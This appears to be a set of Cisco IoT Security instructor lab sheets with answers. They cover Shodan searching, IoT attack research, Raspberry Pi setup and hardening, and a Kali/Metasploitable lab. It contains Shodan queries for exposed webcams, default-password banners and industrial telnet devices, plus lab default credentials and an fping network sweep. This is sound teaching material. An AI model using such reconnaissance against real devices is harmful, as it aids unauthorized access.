Professional Documents
Culture Documents
Objectives
Part 1: Obtain Access to Shodan’s Free Features
Part 2: Investigate Connected IoT Devices
Background / Scenario
Warning: Do not attempt to login to any device you find on the Shodan search engine. Doing so violates your
ethical hacking agreement.
In this lab, you will use the Shodan search engine to gain an understanding of why security should be the
focus of any IoT implementation.
Shodan has servers located around the world that continually crawl the Internet looking for connected
devices. It can find specific devices and device types. This data can then be searched. Some of the more
popular searches include terms such as "webcam", "default passwords", "routers", "video games," and more.
Shodan is a favorite tool used by researchers, security professionals, large enterprises, and computer
emergency response teams (CERTs).
• Researchers can use Shodan to data mine information about what devices are connected, where they
are connected, and what services are exposed.
• Security professionals can use Shodan as part of a penetration testing plan to discover devices that need
to be hardened to prevent potential attacks.
• Large enterprises employ security professionals who should be aware of tools like Shodan for
determining the current risk profile of the enterprise’s connected devices.
• CERTs can use Shodan to quickly generate reports about an emerging attack on connected devices.
Shodan is also a tool used by nefarious individuals and groups commonly referred to as threat actors. Shodan
can accelerate a threat actor’s reconnaissance of Internet connected devices. Like all the tools in this course,
you must use it responsibly according to your organization’s ethical hacking policies.
Instructor Note: Shodan is a powerful website where students can easily get into trouble. For example,
students can find default login information and use it to access the configuration webpage for a device. This
violates ethical hacking agreements.
Required Resources
• Device with Internet access.
• SANS Penetration Testing article, “Getting the Most Out of Shodan Searches”
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 5 www.netacad.com
Lab - Shodan Search
1) If you click Create a Free Account, you will be directed to a page where you can fill in a form to
create an account on Shodan.
2) If you click Login or Register, you will be directed to a page where you can sign in with one of
several other accounts that you may have, including Google or Facebook.
c. After successfully logging in, you will see your account page, as shown below. Click the Shodan link to
return to the homepage.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 5 www.netacad.com
Lab - Shodan Search
Note: Not all devices discovered by Shodan are vulnerable. Shodan results consist of Internet-connected
devices and information about those devices. This information may or may not reveal potential
vulnerabilities.
d. On the right side, the main section of your search shows the devices that match your search. Find an
entry that looks interesting to you and fill in the information below.
IP address: ___________________________________________________________________________
Hostname: ___________________________________________________________________________
ISP: ________________________________________________________________________________
Date the entry was added: _______________________________________________________________
Country: _____________________________________________________________________________
e. Your entry will also show some banner information. You may see the beginnings of an SSH banner or an
HTTP banner. Click Details for more information about your entry. You should see several open ports. If
not, try a different entry. List the information you found below.
City and Country: ______________________________________________________________________
Ports open: __________________________________________________________________________
Services running: ______________________________________________________________________
Key types: ___________________________________________________________________________
Answers will vary. Encourage students to look for a variety of open ports including 22 (SSH), 25 (SMTP),
80 (HTTP), 123 (NTP), and 443 (HTTPS). They should be able to find one that lists the encryption keys
for SSH.
f. Return to the Shodan homepage and click Explore. What are some of the Top Voted results?
____________________________________________________________________________________
At the time of testing this lab, Top Voted results included Webcam, Cams, Netcam, default password, and
dreambox.
One of the Top Voted results for you may have been default password. If so, click default password to
see the results. If not, in the search field, type the keywords “default password,” with the quotes, and
press Enter. You will see several results that show default passwords embedded in the banners for
devices. Hopefully, the owners of these devices have changed the default password. However, this
highlights how easy it can be to login to a device if appropriate security measures are not implemented.
Warning: Do not attempt to login to any device you find on the Shodan search engine. Doing so violates
your ethical hacking agreement.
g. In the search field, type the keyword “webcam” with the quotes and press Enter. What is your count for
Total Results?
____________________________________________________________________________________
At the time of testing this lab, Total Results was over 6,000.
h. In the search field, type the keyword “refrigerator” with the quotes and press Enter. What is your count for
Total Results?
____________________________________________________________________________________
At the time of testing this lab, Total Results was 193.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 5 www.netacad.com
Lab - Shodan Search
Step 2: Use keywords together with search operators to filter your search.
You may have noticed that you can only get two pages of results with your free account access. However,
even with a paid account you would not want to click through the pages that list thousands or millions of
results. Instead, you can combine keywords and search operators to filter your results.
Shodan searches for the services running on a device. It then collects banner information for each service.
For example, here is the banner information for the SNMP service running on a Cisco device found with the
Shodan search:
Cisco Internetwork Operating System Software
IOS (tm) 7200 Software (UBR7200-IK9SU2-M), Version 12.3(23)BC10, RELEASE SOFTWARE
(fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2011 by cisco Systems, Inc.
A search for just "cisco" most likely reveals one to two million results for you. That information may be helpful
to you. However, if you are interested in more specific information, you will want to filter your search using
filter names and values from the banner information.
For example, if you are interested in seeing how many Cisco 7200 routers in the United States are running
the SNMP service, you would enter the following search phrase.
country:US product:"Cisco 7200 Router" port:161
Note: Shodan searches use the two letter (alpha-2) country code based on the International Standards
Organization’s 3166 publication (ISO 3166-1993).
Create your own searches to find the following:
a. Minecraft is a popular video game where players can set up their own servers for others to access online.
Use an Internet search to find the following information.
What is the common port number used by Minecraft servers? ____________ 25565
What is the ISO 3166 alpha-2 code for South Africa? __________ ZA
What Shodan search phrase can you use to discover how many Minecraft servers are currently online in
South Africa?
____________________________________________________________________________________
Minecraft port:"25565" country:"ZA"
How many Minecraft servers are currently online in South Africa? ________________________________
At the time of testing this lab, Total Results was 318.
b. Moxa is a supplier of devices that connect industrial equipment to the Internet. How many Moxa devices
are running the Telnet service in Brazil?
Search phrase: _______________________________________________________________________
moxa port:"23" country:"BR"
Total results:
____________________________________________________________________________________
At the time of testing this lab, Total Results was 5.
c. Use an Internet search or review Shodan help pages and tutorials to discover how you can filter your
searches based on a range of IP addresses.
d. Mr. Robot is an American drama television series that chronicles the adventures of a cybersecurity
engineer. In the series, the protagonist uses the Shodan search engine to research a fictional corporation.
Use an Internet search to find the search string that was used to discover E Corp’s web server.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 5 www.netacad.com
Lab - Shodan Search
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 5 www.netacad.com
Lab - Evaluate Recent IoT Attacks (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Research Recent IoT Attacks
Part 2: Describe Mitigation Techniques
Background / Scenario
As the number of IoT devices continue to grow at an exponential rate, so are the number of attacks on these
devices. There are a wide variety of attacks on IoT devices that have been documented and reported on the
news.
As an IT professional working with IoT devices, it is important to be aware of the wide range of attacks and
vulnerabilities that have occurred on these devices. It is also important to know how to defend against and
minimize the damage from these types of attacks.
Required Resources
PC or mobile device with Internet access
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 4 www.netacad.com
Lab - Evaluate Recent IoT Attacks
Attack #1:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
DDoS attack on DNS provider Dyn.
Cyber attack that knocked out major websites such as Twitter, GitHub, Spotify, and Shopify.
The Mirai botnet targets poorly protected IoT connected devices and uses them to launch a DDoS attack
using specific targets. A Chinese electronics manufacturer admitted that its products inadvertently contributed
to this attack. In this particular attack, the Mirai botnet attacked DVRs and IT cameras made by a Chinese
electronics manufacturer.
http://www.foxnews.com/tech/2016/10/25/ddos-attackers-exploited-insecure-iot-gadgets-from-chinese-
company.amp.html
Attack #2:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 4 www.netacad.com
Lab - Evaluate Recent IoT Attacks
Attack #3:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 4 www.netacad.com
Lab - Evaluate Recent IoT Attacks
Attack #2:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Attack #3:
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 4 www.netacad.com
Lab - Evaluate Home Automation Products (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Conduct Research for Home Automation Products
Part 2: Prepare a Presentation
Background / Scenario
In this lab, you will investigate the wide variety of home automation products. Some products may require
monitoring or maintenance services, so your geographical location will most likely have an impact on your
choices.
Assume you have a budget of $1000 (or equivalent local currency) and the choice of one primary objective for
home automation:
Increases convenience
Enhances security
Saves energy
You will choose an objective and conduct online research to find home automation products to satisfy your
objective. You will then select the desired products keeping the total cost under $1,000 and prepare a
presentation about what you bought, how it achieves your goal, and how the system will be used by the
customer.
Instructor Note: This is an open-ended lab assignment. Answers will vary widely based on what the student
chooses as an objective and the location. The primary purpose of the lab is for students to build an awareness of
the wide variety of offerings available for home automation.
Required Resources
PC or mobile device with Internet access
Presentation preparation software
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 3 www.netacad.com
Lab - Evaluate Home Automation Products
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 3 www.netacad.com
Lab - Evaluate Home Automation Products
Describe your goals for this project. What was your objective?
Describe the products that you chose for purchase including their complete cost.
How close to $1000 did you spend?
Describe how the products help achieve your goals.
Explain what your new system would look like and how it functions.
Use the following space to draft your notes for presentation preparation.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 3 www.netacad.com
Lab - Evaluate the IoT Security Risk in an Industry Sector
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Research Risks for an Industry Sector
Part 2: Investigate the Potential Impact of a Security Breach
Part 3: Describe Security Measures for Your Industry Sector
Background / Scenario
Any implementation of IoT is going to have risk associated with it. Risks could range from fairly insignificant to
very destructive depending on the market, equipment, number of people affected, and numerous other
factors.
In this lab, you will research an industry sector and evaluate the risks associated with implementing an IoT
solution. One of the following industry sectors will be assigned to you.
agriculture
automotive
banking
construction
education
healthcare
manufacturing
mining
retail
technology industries
utilities
Instructor Note: This would be a good activity to have students work in groups to brainstorm some ideas and
then present their findings in a quick 5-minute executive summary. Also, it may be worthwhile to initiate a
discussion within the course forum to solicit more dialog.
Required Resources
Computer with Internet access to be used for research
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 3 www.netacad.com
Lab - Evaluate the IoT Security Risk in an Industry Sector
a. What types of communications services or protocols are used for connecting IoT devices in your industry
sector?
____________________________________________________________________________________
____________________________________________________________________________________
Wired or wireless Ethernet, serial communication, I2C, Bluetooth, cellular, http, https
b. What are some of the known vulnerabilities?
____________________________________________________________________________________
____________________________________________________________________________________
With WiFi weak encryption, http is plain text, Bluetooth can be highjacked, serial communication can be
tapped into, Ethernet in traffic in general can be sniffed and captured.
c. What type of data is being transmitted or stored?
____________________________________________________________________________________
____________________________________________________________________________________
Would altering the data transmitted or stored be damaging? Altered data such as health readings could
have pose a life-threatening situation. Data such as storm information could cause a panic much like what
happened in Hawaii earlier this year.
d. What types of equipment are being monitored or managed?
____________________________________________________________________________________
____________________________________________________________________________________
Depending on the vertical, equipment monitored could be anything from a healthcare device to electrical
grid equipment.
e. What other questions are unique to your industry sector?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 3 www.netacad.com
Lab - Evaluate the IoT Security Risk in an Industry Sector
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 3 www.netacad.com
Lab - Set Up PL-App on a Raspberry Pi (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Lab Topology
Objectives
Set up a Raspberry Pi board as a The Prototyping Lab Application (PL-App) device
Use PL-App Launcher to provision and discover PL-App devices
Background
The IoT Security lab topology uses a Raspberry Pi that is connected to a PC. The PC will be used to work
with Python and Jupyter notebooks that are running on the Raspberry Pi. In addition, for some labs, the PC
will run a virtual machine (VM) that interacts with the Pi.
PL-App consists of two components. The first is the PL-App launcher application that runs on the PC. It is
used to provision a PL-App image that is written to a microSD card (µSD) card for the Raspberry Pi. In
addition, PL-App runs on the Raspberry Pi. It contains the Jupyter notebooks software and enables access to
the notebooks and other functions of the Raspberry Pi.
With PL-App, you can access existing IoT Fundamentals labs in the Course Materials folder or write your own
new applications directly on the Raspberry Pi, execute them, and monitor the output from the board with
various visualizations.
Required Resources
PL-App Launcher application
PL-App Image file
Wired Ethernet or Wi-Fi connection to the local-area network with DHCP
Raspberry Pi with a power adapter
Google Chrome or other modern web browser
8GB µSD
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 9 www.netacad.com
Lab - Set Up PL-App on a Raspberry Pi
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 9 www.netacad.com
Lab - Set Up PL-App on a Raspberry Pi
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 9 www.netacad.com
Lab - Set Up PL-App on a Raspberry Pi
b. If your Raspberry Pi will be connected to the network over Wi-Fi, enter the optional settings section and
configure the following:
o Wi-Fi SSID - The name of the Wi-Fi network to join (e.g. ClassroomWiFi)
o Wi-Fi Password - The WPA2 Pre-Shared Key
c. When your settings are correct, click the Write Disk Image button to write the PL-App image to the
selected SD card. This will overwrite all data on the card. The process will also write your configuration
settings to the SD card in a file called chestnut.txt. Depending on the speed of your µSD card, this
process might take 5-10 minutes to complete.
Note: If the µSD card has already been flashed with the PL-App image, and you only want to change the
existing settings (e.g. Device Name, Wireless Settings, etc.), then click the Update Config Only button to
update only the setup configuration.
d. When the µSD card setup is complete, use the file explorer to verify the contents of the µSD card. You
should see the µSD card drive name has changed to CISCO-PLAPP.
e. Explore the µSD card drive. You should see the notebooks folder and the chestnut.txt setup file:
o The D:\chestnut.txt file contains the setup information that was created using the PL-App Launcher. If
you need to change any of these settings, you can either use the PL-App Launcher with the Update
Config Only button to update these settings and preserve all the other contents of the SD card, or
edit this file manually.
o The D:\notebooks\Course Materials folder contains all the default notebook files that were bundled
with the release of the PL-App image that was flashed on the µSD card. If you want the most recent,
or unmodified, version of the lab notebooks, download the notebooks zip archive from the course
page and unpack it to the D:\notebooks\Course Materials\coursename folder (the drive letter D: might
be different on your computer). You can also easily backup either your own notebook files, or the
Course Materials, by copying this folder to your computer.
f. You will need secure shell (SSH) access to your Raspberry Pi in later labs. SSH can be enabled by
placing an empty file named ssh in D drive (D:\ssh). When the Raspberry Pi boots, SSH is enabled when
the file is found, and the file ssh is deleted from the file system.
g. Before removing the µSD card from your computer, make sure to safely unmount it by right-clicking the
drive and selecting Eject USB Storage.
h. Remove the µSD card from your computer.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 9 www.netacad.com
Lab - Set Up PL-App on a Raspberry Pi
Alternate Step 4 for Advanced Linux users: Setup a µSD card with PL-App
This is a command-line only guide for advanced Linux users. Be very careful. Incorrect use of these tools
might overwrite the data on your primary hard disk. All the existing contents of the µSD card will be
overwritten in this step.
a. Change the current working directory to the location of the PL-App image zip file that you downloaded
previously:
cd Downloads
b. Identify the device name of your µSD card (e.g. sdb):
sudo fdisk –l
c. Check if any of the µSD card partitions are mounted using the mount command and then unmount them.
d. Using dd, transfer the PL-App image to your µSD card (Use caution at this step. Selecting a wrong output
file "of=" parameter can overwrite your own hard disk drive and your own data):
unzip -p -d chestnut.img PL-App-xxxxxx.zip | sudo dd bs=1M of=/dev/{SD card
device name}
e. Wait for dd to complete. It might take 5-10 minutes without showing any output. Be patient.
f. When completed, remove the µSD card USB reader, wait a second, and then plug it back in to mount the
newly created partition on it.
g. In the mounted µSD card partition (with FAT file system and 1 GB in size), create a new text file called
chestnut.txt in the CISCO-PLAPP with the following contents:
Device_Name="{YOUR-NETACAD-USERNAME}-{YOUR-RPi-DEVICE-NAME}"
Device_Password="{YOUR-PL-App-PASSWORD}"
SSID="{YOUR-WIFI-SSID}"
Wifi_Password="{YOUR-WIFI-PASSWORD}"
Example:
Device_Name="myNetAcadUsername-myRPi1"
Device_Password="this is my device password"
SSID="ClassroomWIFI"
Wifi_Password="WPA2password"
h. You will need secure shell (SSH) access to your Raspberry Pi in later labs. SSH can be enabled by
creating an empty file named ssh in CISCO-PLAPP partition. When the Raspberry Pi boots, SSH is
enabled when the file is found, and the file ssh is deleted from the file system.
touch ssh
i. Unmount and remove the µSD card USB reader from your computer.
j. Make sure your Linux computer supports mDNS discovery of hostnames:
sudo apt-get install libnss-mdns
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 9 www.netacad.com
Lab - Set Up PL-App on a Raspberry Pi
b. Before entering or removing the µSD card, always make sure that the Raspberry Pi is powered off.
c. Connect the Raspberry Pi to the LAN. If you are using an Ethernet cable, connect the cable to the
Raspberry Pi. Your computer and the Raspberry Pi must be in the same subnet for the PL-App Launcher
discovery to work.
Note: Some labs require Internet connectivity, so a separate Internet connection is desirable.
Instructor Note: The LAN should provide IP addresses to the Raspberry Pi devices using DHCP. In
addition, the network must not block multicast communication. Auto-configured APIPA addresses may
also be used for labs that do not require a connection to the Internet or other LAN resources.
d. Recommended network topology for a classroom with PL-App:
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 9 www.netacad.com
Lab - Set Up PL-App on a Raspberry Pi
e. Power on your Raspberry Pi by connecting the micro USB cable with a power supply that provides
enough current to the Raspberry Pi board. The recommended PSU provides 2.5A to power the Raspberry
Pi 3 Model B.
Note: The red Power LED must be on. If the Power LED is blinking, or is off, the power source from the
PSU is not providing enough power to the board.
f. Start the PL-App Launcher application on a PC that is on the same network as the Raspberry Pi. You
should see the following screen with the Available Devices tab:
g. The Available Devices tab lists all the PL-App devices that have been set up on this computer with PL-
App Launcher, or that were manually added to the list using the Add Device Name button.
PL-App Launcher is continuously trying to discover the listed PL-App Raspberry Pi devices even if they
are not connected to the network. When a device is discovered, its current IP address is shown in the list
and the Connect button turns green.
Note: The first startup of a freshly written µSD card might take longer to connect due to the initial setup
process (expanding the file system of the µSD card, etc.).
Instructor Note: PL-App Launcher is using multicast DNS (mDNS, Bonjour) to discover the listed PL-App
Raspberry Pi devices. Without mDNS routing configured, the discovery mechanism only works within the
same one subnet segment. If the network is blocking multicast communication, PL-App Launcher will be
unable to discover connected devices. In that case, try to select the “Use Broadcast mDNS option” in the
PL-App Launcher to fallback from multicast to broadcast packets.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 9 www.netacad.com
Lab - Set Up PL-App on a Raspberry Pi
As mentioned above, only PL-App images created on the computer will show up in the list of available
devices. Devices can be added manually, however the device name must be entered to enable this.
h. Click the green Connect button of your device in PL-App Launcher to directly connect to the local PL-App
web interface that is running on your Raspberry Pi. This opens a new web browser window and
establishes a connection to the selected PL-App over HTTP.
i. Log in to the web interface of PL-App. Use the device password you specified in PL-App Launcher in the
setup process of the µSD card.
After a successful login, the PL-App directory browser opens the root directory of the notebooks:
This is the PL-App’s representation of the notebooks folder that was created on the µSD card.
The basic structure of the folders in the root notebooks directory is as follows:
o Course Materials: this folder contains Cisco authored labs in the form of Jupyter Notebooks.
o myfiles: this folder is your space to create your own Jupyter Notebooks and other files.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 9 www.netacad.com
Lab - Set Up PL-App on a Raspberry Pi
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 9 of 9 www.netacad.com
Lab – Set Up the IoT Security Lab Topology (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
Part 1: Setup the Lab Environment
Part 2: Import the IoT Security Virtual Machines
Background / Scenario
Computing power and resources have increased tremendously over the last 10 years. A benefit of having
multicore processors and large amounts of RAM is the ability to use virtualization. With virtualization, one or
more virtual computers operate inside one physical computer. Virtual computers that run within physical
computers are called virtual machines (VMs). VMs are often called guests, and physical computers are often
called hosts. Anyone with a modern computer and operating system can run VMs.
In this lab, you will set up and explore the lab environment that will be used in this course. A VM is used for
many of the labs in this course. The VM is created with Oracle VirtualBox and an Oracle virtual appliance
(OVA) file. The OVA file contains a special version of Linux called Kali. Kali is a very popular Linux distribution
that contains many tools that are used for assessing network security. VirtualBox allows you to run this
version of Linux on a Mac or PC as a VM. You can use this VM to interact with other hosts on the lab network.
Note: Only use Kali tools on networks on which you are authorized to do so. Abuse of the Kali tools will be a
violation of your ethical hacking agreement.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 5 www.netacad.com
Lab – Set Up the IoT Security Lab Topology
Required Resources
Host computer with at least 4 GB of RAM and 15 GB of free disk space
Oracle VirtualBox
IoT Security Kali Linux OVA and Metasploitable OVA files
Internet connection
An Ethernet patch cable
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 5 www.netacad.com
Lab – Set Up the IoT Security Lab Topology
b. A new window will appear presenting the settings suggested in the OVA archive. Check the "Reinitialize
the MAC address of all network cards" box at the bottom of the window. Leave all other settings as
default. Click Import.
c. After the import is complete, VirtualBox will show the new Kali VM in its inventory. Your Kali Linux VM file
name might be different than the graphic shown below.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 5 www.netacad.com
Lab – Set Up the IoT Security Lab Topology
d. After Kali starts, you should see the desktop as shown below.
e. Click the Terminal icon in the desktop applications bar as shown in the figure.
f. Run the shell script that will configure IP addressing. To run the script, at the terminal prompt type the
following:
root@kali:~# ./lab_support_files/scripts/start_dhcp.sh
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
g. After the script executes, at the terminal prompt, type ifconfig.
root@kali:~# ifconfig
What IP address was assigned to the VM eth0 interface? ____________________________ 203.0.113.1
h. Minimize the VirtualBox window and open PL-App. Select the Available Devices tab. You should see your
Raspberry Pi listed. Make note of the IP address of your Raspberry Pi.
IP address of the Raspberry Pi: ___________________________________
Note: If PL-App is not showing the IP address of the Raspberry Pi, use the command fping at the
terminal window to determine the IP address.
root@kali:~# fping -a -r 0 -g 203.0.113.0/24
Warning: The use of fping can be considered as an attack. Please do not use this command on a
production network.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 5 www.netacad.com
Lab – Set Up the IoT Security Lab Topology
i. Return to the VM. At a terminal prompt, ping the IP address of your Raspberry Pi. Use the -c 5 parameter
to limit your ping to five echo requests. If everything is working properly, you should see five successful
echo replies. You have now tested the connection between the Kali Linux virtual machine and the
Raspberry Pi.
j. Now open the Firefox ESR browser from the Kali desktop applications bar. Its icon is just above the
Terminal icon.
k. Type the IP address of the Raspberry Pi into the address bar and press Enter. You should see the
Jupyter notebooks home page appear.
Note: Because the VM shares the same network adapter as the physical computer, you can access the
Pi from either machine.
l. Start and log into the Metasploitable VM. Notice the displayed messages.
What is the login credential?
____________________________________________________________________________________
Username: msfadmin password: msfadmin
What is the IP address assigned to Metasploitable VM? What was the command used to determine the IP
address?
____________________________________________________________________________________
The IP address is 203.0.113.5. The command used to determine the IP address is ifconfig.
Note: To release the mouse from Metasploitable VM, press the right control key.
m. To verify network connectivity, you should be able to ping all the VMs and the Raspberry Pi.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 5 www.netacad.com
Lab - Harden a Raspberry Pi (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
Part 1: Securing Remote Access
Part 2: Removing the Default Pi User Account
Part 3: Configuring the Uncomplicated Firewall (UFW)
Background/Scenario
The Raspberry Pi is a doorway to the Internet of Things (IoT). In this lab you will take a Raspberry Pi that is
acting as an IoT gateway device and perform device hardening. You will harden the Raspberry Pi by following
recommended security practices for the Raspbian OS. You will also limit the network protocols and services
allowed to connect to the IoT gateway by activating and configuring the Uncomplicated Firewall (UFW).
Finally, you will utilize a separate Kali VM with the Kali Linux OS, acting as a threat actor, to test the security
of the IoT gateway.
Required Resources
Raspberry Pi 3 Model B or later (with PL-App)
8GB Micro SD card (minimum required)
PC with IoTSec Kali VM
Network connectivity between PC and Raspberry Pi
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
on the Pi are enabled, unknown users on the network could attempt a connection using these default
credentials. While basic security would advise the changing of the password for the “pi” user, having a default
username alone is a security risk.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
c. To stop the Raspberry Pi from logging in to a user account automatically at boot, issue the sudo raspi-
config terminal command.
pi@IoTpi:~ $ sudo raspi-config
d. Select Boot Options to configure options for start-up.
e. Select Desktop / CLI to choose whether to boot into a desktop environment or the command line.
f. Select Console to require users to log into text console.
g. Select Finish and click Yes to reboot when prompted.
h. After reboot, use the Kali VM to SSH into the kingbob account of the IoTpi.
root@kali:~# ssh kingbob@203.0.113.12
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
The AllowUsers kingbob command permits SSH authentication using the username and password for
the local kingbob account. The DenyUsers kevin command prevents SSH authentication using the kevin
credentials.
c. To force the SSH settings to take effect now, restart the SSH service using sudo systemctl restart ssh.
kingbob@IoTpi:~ $ sudo systemctl restart ssh
d. Verify that the kevin user account cannot be exploited by a threat actor via the SSH service. Issue the
command ssh kevin@203.0.113.12 to attempt an SSH connection with the kevin username.
root@kali:~# ssh kevin@203.0.113.12
e. After issuing the password for the kevin user account the IoT gateway reports SSH access is denied.
kevin@203.0.113.12's password:
Permission denied, please try again.
f. SSH into the Raspberry Pi using the kingbob account, which is permitted to access the IoTpi via SSH.
root@kali:~# ssh kingbob@203.0.113.12
Step 1: Open a terminal and remove the Pi account but leave the directory.
a. To remove the pi account from the IoT gateway, make sure you are logged into the “kingbob” account.
Then, enter the sudo deluser pi command in the terminal.
kingbob@IoTpi:~ $ sudo deluser pi
Removing user `pi' ...
Warning: group `pi' has no more members.
Done.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
____________________________________________________________________________________
Search for pi in /etc/passwd or other files that have username info. A sample command to look for pi: grep
pi /etc/passwd
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
Rules updated
Rules updated (v6)
d. To activate the UFW firewall, which is disabled by default, enter sudo ufw enable. Ensure that you have
added the allow ssh statement to the UFW before activating the UFW firewall.
kingbob@IoTpi:~ $ sudo ufw enable
Command may disrupt existing ssh connections. Proceed with operation (y|n)? y
Firewall is active and enabled on system startup
Instructor Note: If a student accidentally enables UFW without first permitting SSH, the Pi will be
unreachable over the network. If this occurs, you may be able to access the Pi directly by connecting a
keyboard and monitor, or by creating a new SD card image with PL-App.
e. Observe the UFW firewall rules.
You should see the UFW rules that you have created using the sudo ufw status command.
kingbob@IoTpi:~ $ sudo ufw status
Status: active
To Action From
-- ------ ----
80/tcp DENY Anywhere
23/tcp DENY Anywhere
21/tcp DENY Anywhere
22/tcp ALLOW Anywhere
80/tcp (v6) DENY Anywhere (v6)
23/tcp (v6) DENY Anywhere (v6)
21/tcp (v6) DENY Anywhere (v6)
22/tcp (v6) ALLOW Anywhere (v6)
The Allow statements are showing the permitted connections available.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
Answers may vary but should include that the action listed is “Limit” which is allowing connections that
authenticate successfully within the first 6 attempts in a period of 30 seconds.
c. According to the UFW rules, if a permit HTTPS rule is NOT created, what will happen to HTTPS traffic
that arrives at the IoTpi interface?
____________________________________________________________________________________
____________________________________________________________________________________
Answers should include that any protocol/service that is not specifically permitted will be denied. HTTPS
sessions targeting the Pi will be denied by the UFW.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
Part 4: Cleanup
It is very important to harden any IoT gateway device to protect against cybersecurity incidents. However, for
classroom purposes, the Raspberry Pi device should be returned to its original configuration so that other
users can access it as required for other courses.
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 9 of 11 www.netacad.com
Lab - Harden a Raspberry Pi
Reflection
1. What are some common ports and services that may exist on an IoT device and should be locked down that
were not mentioned in this lab?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
